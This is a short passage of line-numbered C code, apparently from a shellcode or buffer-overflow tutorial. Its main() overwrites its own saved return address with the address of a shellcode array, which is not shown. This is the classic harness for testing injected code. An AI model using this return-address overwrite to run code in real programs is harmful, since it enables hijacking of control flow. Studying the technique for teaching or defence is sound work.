| main() { 50 | long *ret; 51 | 52 | ret = (long *)&ret + 2; 53 | (*ret) = (long)shellcode; 54 | 55 | } 56 | 57 | --------------------------------------------------------------------------------